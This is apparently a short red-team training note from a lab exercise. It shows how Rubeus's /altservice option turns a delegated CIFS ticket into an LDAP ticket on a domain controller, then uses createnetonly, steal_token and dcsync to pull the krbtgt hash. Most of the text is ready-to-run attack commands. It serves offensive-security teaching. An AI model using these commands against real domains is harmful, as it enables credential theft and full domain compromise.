Alternate Service Name

The cifs service can be leveraged for lateral movement, but what if port 445 was unavailable or we wanted an option other then PsExec? Since the cifs service is run by the computer account by default, it means we can request a TGS for any other service also run by the computer account.

This can be abused using /altservice flag in Rubeus. In this example, we're using the same TGT for SQL-2 to request a TGS for LDAP.

Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv

steal_token 2580

Against a domain controller, the LDAP service allows us to perform a dcsync.

dcsync dev.cyberbotic.io DEV\krbtgt

Last updated 2 years ago